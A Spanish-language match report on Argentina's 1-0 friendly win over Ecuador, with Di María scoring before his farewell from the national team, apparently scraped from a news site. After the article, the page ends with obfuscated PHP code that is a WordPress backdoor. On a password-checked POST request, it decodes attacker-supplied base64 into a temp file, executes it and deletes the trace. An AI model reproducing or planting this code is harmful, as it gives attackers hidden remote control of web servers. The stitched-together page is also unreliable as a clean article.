Di María, el inagotable

El Fideo anotó el único gol del partido y rozó el segundo con un tiro libre al travesaño. Enfila su despedida de la selección y buscará otro título.

Argentina ganó su primer y más duro amistoso antes de intentar revalidar el título en la Copa América gracias a un gol de Di María en los instantes finales del primer tiempo. Messi jugó 35 minutos y no pudo destacar demasiado en un partido que fue de más a menos. La vigente campeona del mundo brilló en la presión en campo rival pero acusó falta de pegada y finalización de sus intentos.

Aunque la albiceleste monopolizó la posesión desde el primer instante, tuvo problemas para romper la presión ecuatoriana y generar peligro. De Paul fue claro protagonista en la medular y Álvarez apareció de manera constante lejos del arco para crear superioridades. Con el paso de los minutos los hombres de Scaloni ganaron metros y obligaron a su rival a defender mucho más atrás.

En Ecuador apenas Páez dejó algún destello de su clase en campo rival pero el equipo sufrió con balón. Acusó falta de creatividad y de ideas a la hora de avanzar con la pelota dominada. De esa manera llegaron pérdidas constantes que hicieron crecer aún más a Argentina. El primer tanto llegó a los 40 minutos con una acción iniciada por De Paul, que conectó con Romero -posiblemente en fuera de juego- en el borde del área y el central mostró clarividencia para habilitar a un Di María que definió con clase en el área.

El Fideo, que se despedirá de la selección en la Copa América, estuvo a unos centímetros de convertir de nuevo antes del descanso con un formidable golpeo de tiro libre. Con la suplencia de Messi lució el brazalete de capitán y demostró su jerarquía con una zurda inagotable. Ya a los 55 minutos el ‘10′ entró al choque por Di María y asumió el liderazgo del ataque.

Durante la segunda mitad el juego se cayó de manera estrepitosa con demasiadas imprecisiones y pausas en el juego. Además, según corrió el reloj el desgaste se impuso en buena parte de los protagonistas y se perdió fluidez y ritmo. Ecuador, que parecía tener un punto más en lo físico, se animó a buscar el empate y gozó de varios acercamientos que no llegaron a inquietar al Dibu. De hecho, fue Nico González quien, en un mano a mano, tuvo la ocasión más clara para sentenciar el choque.

El viernes Argentina jugará su segundo y último amistoso frente a Guatemala y después encarará el partido inaugural de la Copa América el día 20 frente a Canadá. Ecuador, por su parte, aún jugará dos partidos previos al torneo contra Bolivia Honduras.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}